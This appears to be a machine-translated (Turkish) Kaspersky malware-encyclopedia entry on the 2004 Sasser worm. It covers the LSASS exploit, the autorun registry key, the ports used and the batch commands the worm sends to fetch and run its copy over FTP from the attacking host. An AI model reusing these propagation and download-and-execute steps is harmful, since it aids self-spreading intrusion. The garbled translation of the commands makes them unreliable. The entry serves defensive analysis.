BU SERVİS, GOOGLE TARAFINDAN SAĞLANAN ÇEVİRİLER İÇEREBİLİR. GOOGLE, HERHANGİ BİR GARANTİ, GÜVENİLİRLİK VE TİCARİ ELVERİŞLİLİK, BELİRLİ BİR AMACA UYGUNLUK VE İHLAL ETMEME GARANTİLERİ DAHİL OLMAK ÜZERE AÇIK VEYA ZIMNİ GARANTİLER DE DAHİL OLMAK ÜZERE, AÇIK VEYA ZIMNİ TÜM GARANTİLERİ REDDEDER.

Kaspersky Lab web sitesi, Google Çeviri tarafından desteklenen çeviri yazılımı kullanılarak size kolaylık sağlamak amacıyla tercüme edilmiştir. Doğru bir çeviri sağlamak için makul çabalar sarf edilmiştir, ancak otomatik çeviri mükemmel değildir ve insan çevirmenlerinin yerini alması amaçlanmamıştır. Çeviriler, Kaspersky Lab web sitesinin kullanıcılarına bir hizmet olarak sunulur ve "olduğu gibi" sağlanır. İngilizce'den başka bir dile çevrilmiş herhangi bir çevirinin doğruluğu, güvenilirliği veya doğruluğu konusunda açık ya da zımni hiçbir garanti verilmemektedir. Çeviri yazılımı sınırlamaları nedeniyle bazı içerikler (görüntüler, videolar, Flash vb. Gibi) doğru bir şekilde çevrilemeyebilir.

Net-Worm.Win32.Sasser

Bulunma tarihi 05/13/2004
Sınıf Net-Worm
Platform Win32
Açıklama

Sasser, Microsoft Güvenlik Bülteni MS04-011'de açıklanan MS Windows LSASS güvenlik açığından yararlanan bir Internet solucanıdır.

Microsoft, bu güvenlik açığı için 13 Nisan 2004 tarihinde bir yama yayınlarken, Sasser.a ilk olarak 30 Nisan 2004'te tespit edildi.

Sasser, Lovesan'a çok benzer bir şekilde çalışır, ancak Lovesan , LSASS hizmetinde değil, PRC DCOM hizmetindeki bir güvenlik açığından yararlanır.

Sasser, Windows 2000, Windows XP, Windows Server 2003 çalıştıran bilgisayarları etkiler. Sasser, Windows'un diğer tüm sürümlerinde çalışır ancak bu güvenlik açığından etkilenerek bunları etkileyemez.

Sasser, C / C ++ ile Visual C complier kullanılarak yazılmıştır. Solucan yaklaşık 15 KL'dir ve PECompact2 tarafından paketlenmiştir.

Enfeksiyon belirtileri

  • Windows dizinindeki 'avserve.exe' dosyası.
  • Sistemin yeniden başlatılmasına neden olan LSASS hizmeti başarısızlıkla ilgili bir hata mesajı.

Yayılma

Başladıktan sonra, Sasser kendini avserve.exe adı altında Windows kök dizinine kopyalar ve bu dosyayı sistem kayıt defteri otomatik çalıştırma anahtarına kaydeder:

 [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun]



 "avserve.exe" = "% WINDIR% avserve.exe" 

Sasser gelecekteki enfeksiyon girişimleri durumunda kendi kopyalarını bulmak için RAM'de 'Jobaka31' benzersiz bir tanımlayıcı oluşturur.

Sasser, 5554 numaralı TCP bağlantı noktasında FTP sunucusunu başlattı ve daha sonra 128 yayın rutinini başlattı. Bu süreçte, sistem yeniden başlatılmasını yasaklamak için solucan AbortSystemShutdown işlemini başlatmaya çalışır.

Sasser, kurban adreslerini tanımlamak için bir IP-adresi taraması başlatır ve 445 numaralı TCP bağlantı noktasına bir istek gönderir. Herhangi bir makine yanıt verirse Sasser, 9996 numaralı TCP bağlantı noktasında bir 'cmd.exe' komut kabuğu başlatmak için LSASS güvenlik açığından yararlanır. Son olarak Sasser, "N", rastgele bir sayı olduğu "N_up.exe" adı altında ana solucan bileşenini indirip başlatmak için virüslü makineye komut verir:

 Eko kapalı



echo open [saldırı makinesi adresi] 5554 >> cmd.ftp



yankı anonim >> cmd.ftp



echo kullanıcısı



echo bin >> cmd.ftp



echo [rasgele sayı] _up.exe olsun >> cmd.ftp



echo bye >> cmd.ftp



yankılanmak



ftp -s: cmd.ftp



[rasgele sayı] _up.exe



Eko kapalı



del cmd.ftp



yankılanmak 

Sonuç olarak, bir makine bir kereden fazla saldırıya uğrayabilir ve solucanın örnek kopyaları ile birden çok kopyasını içerebilir:

 23101_up.exe



5409_up.exe 

ve benzeri

Diğer

Enfeksiyondan sonra, mağdur makine bir LSASS servisi başarısız olduğunda bir hata mesajı üretir ve bunun ardından yeniden başlatmayı deneyebilir.

Sasser, solucanın tüm saldırıya uğramış makinelerin IP adreslerini kaydettiği C sürücüsü kök dizinindeki 'win.log' dosyasını oluşturur.


Orijinaline link